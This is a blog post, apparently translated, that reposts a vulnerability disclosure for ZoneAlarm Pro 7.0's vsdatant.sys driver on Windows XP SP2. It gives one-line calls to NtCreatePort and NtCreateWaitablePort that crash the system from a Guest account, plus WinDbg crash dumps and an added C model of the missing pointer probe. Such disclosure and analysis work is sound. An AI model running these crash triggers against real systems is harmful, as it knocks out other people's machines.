18 Jun

Exploit for Zone Alarm

The other day we posted an exploit for KAV, and now it is Zone Alarm's turn, a firewall that yours truly uses a lot.
The original post, in English, is here.


ZoneAlarm Pro version:7.0.337.000
Driver version:7.0.337.000

We are currently working with several antivirus / firewall products and testing the stability of some of them, which reveals a very bad situation. ;)

Everyone loves to use hooks =), unfortunately the level of knowledge of their kernel driver developers leaves much to be desired. They simply do not know how to handle SSDT hooks.


System: Windows XP SP2 without PAE
Exploit: NtCreatePort, poor hook handling, service id 46

NtCreatePort is hooked by functions in the vsdatant.sys driver.

Function prototype


NTSYSAPI
NTSTATUS
NTAPI
NtCreatePort(
OUT PHANDLE PortHandle,
IN POBJECT_ATTRIBUTES ObjectAttributes,
IN ULONG MaxDataSize,
IN ULONG MaxMessageSize,
IN ULONG Reserved
);


Here is a small exploit that leads to a blue screen.
This exploit can be launched from the Guest account with minimal rights.


NtCreatePort(nil, pointer($81234567), 0, 0, 0);


And here is the analysis of this BSOD

Originally posted by windbg


kd> !analyze -v
*******************************************************************************
* *
* Bugcheck Analysis *
* *
*******************************************************************************

PAGE_FAULT_IN_NONPAGED_AREA (50)
Invalid system memory was referenced. This cannot be protected by try-except,
it must be protected by a Probe. Typically the address is just plain bad or it
is pointing at freed memory.
Arguments:
Arg1: 8123456f, memory referenced.
Arg2: 00000000, value 0 = read operation, 1 = write operation.
Arg3: fbfdd256, If non-zero, the instruction address which referenced the bad memory
address.
Arg4: 00000000, (reserved)

Debugging Details:
------------------

ANALYSIS: Kernel with unknown size. Will force reload symbols with known size.
ANALYSIS: Force reload command: .reload /f ntoskrnl.exe=FFFFFFFF804D7000,214600,41108004
***** Kernel symbols are WRONG. Please fix symbols to do analysis.


FAULTING_MODULE: 804d7000 nt

DEBUG_FLR_IMAGE_TIMESTAMP: 45f0fed1

READ_ADDRESS: unable to get nt!MmSpecialPoolStart
unable to get nt!MmSpecialPoolEnd
unable to get nt!MmPoolCodeStart
unable to get nt!MmPoolCodeEnd
8123456f

FAULTING_IP:
vsdatant+33256
fbfdd256 8b4808 mov ecx,dword ptr [eax+8]

MM_INTERNAL_CODE: 0

CUSTOMER_CRASH_COUNT: 4

DEFAULT_BUCKET_ID: WRONG_SYMBOLS

BUGCHECK_STR: 0x50

LAST_CONTROL_TRANSFER: from 804df06b to fbfdd256

STACK_TEXT:
WARNING: Stack unwind information not available. Following frames may be wrong.
fc65bd48 804df06b 00000000 81234567 00000000 vsdatant+0x33256
fc65bd64 7c90eb94 badb0d00 0012fe10 00000000 nt+0x806b
fc65bd68 badb0d00 0012fe10 00000000 00000000 0x7c90eb94
fc65bd6c 0012fe10 00000000 00000000 00000000 0xbadb0d00
fc65bd70 00000000 00000000 00000000 00000000 0x12fe10


STACK_COMMAND: kb

FOLLOWUP_IP:
vsdatant+33256
fbfdd256 8b4808 mov ecx,dword ptr [eax+8]

SYMBOL_STACK_INDEX: 0

SYMBOL_NAME: vsdatant+33256

FOLLOWUP_NAME: MachineOwner

MODULE_NAME: vsdatant

IMAGE_NAME: vsdatant.sys

BUCKET_ID: WRONG_SYMBOLS

Followup: MachineOwner
---------



Another exploit with the same technique for the same firewall.


System: Windows XP SP2 without PAE
Exploit: NtCreateWaitablePort, service id 56

NtCreateWaitablePort is another function hooked by the driver.

Function prototype

NTSYSAPI
NTSTATUS
NTAPI
NtCreateWaitablePort(
OUT PHANDLE PortHandle,
IN POBJECT_ATTRIBUTES ObjectAttributes,
IN ULONG MaxDataSize,
IN ULONG MaxMessageSize,
IN ULONG Reserved
);



This exploit can be launched from the Guest account with minimal rights.

NtCreateWaitablePort(nil, pointer($81234567), 0, 0, 0);


This leads immediately to a BSOD


windbg analysis


kd> !analyze -v
*******************************************************************************
* *
* Bugcheck Analysis *
* *
*******************************************************************************

PAGE_FAULT_IN_NONPAGED_AREA (50)
Invalid system memory was referenced. This cannot be protected by try-except,
it must be protected by a Probe. Typically the address is just plain bad or it
is pointing at freed memory.
Arguments:
Arg1: 8123456f, memory referenced.
Arg2: 00000000, value 0 = read operation, 1 = write operation.
Arg3: fbfdd336, If non-zero, the instruction address which referenced the bad memory
address.
Arg4: 00000000, (reserved)

Debugging Details:
------------------

ANALYSIS: Kernel with unknown size. Will force reload symbols with known size.
ANALYSIS: Force reload command: .reload /f ntoskrnl.exe=FFFFFFFF804D7000,214600,41108004
***** Kernel symbols are WRONG. Please fix symbols to do analysis.


FAULTING_MODULE: 804d7000 nt

DEBUG_FLR_IMAGE_TIMESTAMP: 45f0fed1

READ_ADDRESS: unable to get nt!MmSpecialPoolStart
unable to get nt!MmSpecialPoolEnd
unable to get nt!MmPoolCodeStart
unable to get nt!MmPoolCodeEnd
8123456f

FAULTING_IP:
vsdatant+33336
fbfdd336 8b4808 mov ecx,dword ptr [eax+8]

MM_INTERNAL_CODE: 0

CUSTOMER_CRASH_COUNT: 5

DEFAULT_BUCKET_ID: WRONG_SYMBOLS

BUGCHECK_STR: 0x50

LAST_CONTROL_TRANSFER: from 804df06b to fbfdd336

STACK_TEXT:
WARNING: Stack unwind information not available. Following frames may be wrong.
f89ded48 804df06b 00000000 81234567 00000000 vsdatant+0x33336
f89ded64 7c90eb94 badb0d00 0012fe10 f90f5d98 nt+0x806b
f89ded68 badb0d00 0012fe10 f90f5d98 f90f5dcc 0x7c90eb94
f89ded6c 0012fe10 f90f5d98 f90f5dcc 00000000 0xbadb0d00
f89ded70 f90f5d98 f90f5dcc 00000000 00000000 0x12fe10
f89ded74 f90f5dcc 00000000 00000000 00000000 0xf90f5d98
f89ded78 00000000 00000000 00000000 00000000 0xf90f5dcc


STACK_COMMAND: kb

FOLLOWUP_IP:
vsdatant+33336
fbfdd336 8b4808 mov ecx,dword ptr [eax+8]

SYMBOL_STACK_INDEX: 0

SYMBOL_NAME: vsdatant+33336

FOLLOWUP_NAME: MachineOwner

MODULE_NAME: vsdatant

IMAGE_NAME: vsdatant.sys

BUCKET_ID: WRONG_SYMBOLS

Followup: MachineOwner
---------



We are sure there are other poorly coded hooks, but we did not keep testing the rest.
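Both crashes have the same root cause: the hook dereferences the caller-supplied ObjectAttributes pointer without probing it (the faulting "mov ecx,dword ptr [eax+8]" reads the ObjectName field at offset 8 of OBJECT_ATTRIBUTES, which is why Arg1 is 8123456f). As an added example that is not part of the original post nor of ZoneAlarm's driver, here is a portable C model of the check an SSDT hook has to apply to a user-mode pointer before touching it; the NTSTATUS values, the ProbeForRead rules, the x86 OBJECT_ATTRIBUTES layout and MmUserProbeAddress = 0x7FFF0000 are documented Windows facts, while the function names and the use of 32-bit integers instead of real pointers are my own so that it runs anywhere.

```c
/* Added example: portable model of the probe a kernel hook must apply to a
 * user-supplied pointer. Addresses are plain 32-bit values, not real pointers,
 * so the model runs on any host; the raise becomes a returned status. */
#include <stdint.h>

/* NTSTATUS values documented for ProbeForRead */
#define STATUS_SUCCESS               0x00000000u
#define STATUS_DATATYPE_MISALIGNMENT 0x80000002u
#define STATUS_ACCESS_VIOLATION      0xC0000005u

/* MmUserProbeAddress on 32-bit Windows without /3GB: user space ends below it. */
#define MM_USER_PROBE_ADDRESS 0x7FFF0000u

enum { KernelMode = 0, UserMode = 1 };   /* KPROCESSOR_MODE */

/* OBJECT_ATTRIBUTES on x86: Length(0) RootDirectory(4) ObjectName(8)
 * Attributes(12) SecurityDescriptor(16) SecurityQualityOfService(20) = 24 bytes,
 * ULONG aligned. The crash dump's [eax+8] is the ObjectName read. */
#define OBJECT_ATTRIBUTES_SIZE  24u
#define OBJECT_ATTRIBUTES_ALIGN 4u

/* Same rules as ProbeForRead: a zero length is not checked, a misaligned
 * address raises STATUS_DATATYPE_MISALIGNMENT, and a range that wraps or
 * reaches MmUserProbeAddress raises STATUS_ACCESS_VIOLATION. */
uint32_t probe_for_read(uint32_t address, uint32_t length, uint32_t alignment)
{
    if (length == 0)
        return STATUS_SUCCESS;
    if ((address & (alignment - 1)) != 0)
        return STATUS_DATATYPE_MISALIGNMENT;
    uint64_t end = (uint64_t)address + length;     /* 64-bit math: no wrap */
    if (end > MM_USER_PROBE_ADDRESS)
        return STATUS_ACCESS_VIOLATION;
    return STATUS_SUCCESS;
}

/* What the hook should do before reading ObjectAttributes (hypothetical name):
 * probe only when the caller came from user mode, since kernel callers may
 * legitimately pass kernel addresses, and hand a failed probe back to the
 * caller as a status instead of dereferencing the pointer. */
uint32_t hook_validate_object_attributes(int previous_mode, uint32_t object_attributes)
{
    if (previous_mode != UserMode)
        return STATUS_SUCCESS;
    return probe_for_read(object_attributes, OBJECT_ATTRIBUTES_SIZE,
                          OBJECT_ATTRIBUTES_ALIGN);
}
```

In a real driver the probe runs inside a __try/__except block, and the hook should then copy the structure into a kernel-side local before passing it to the original service so the user pointer is never read again after the probe. Note that $81234567 fails already on alignment; the aligned kernel address $81234568 fails on the range check instead.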


Regards
EP_X0FF/UG North


1 comment

Hello:::

What extension is the exploit saved with?
Regards




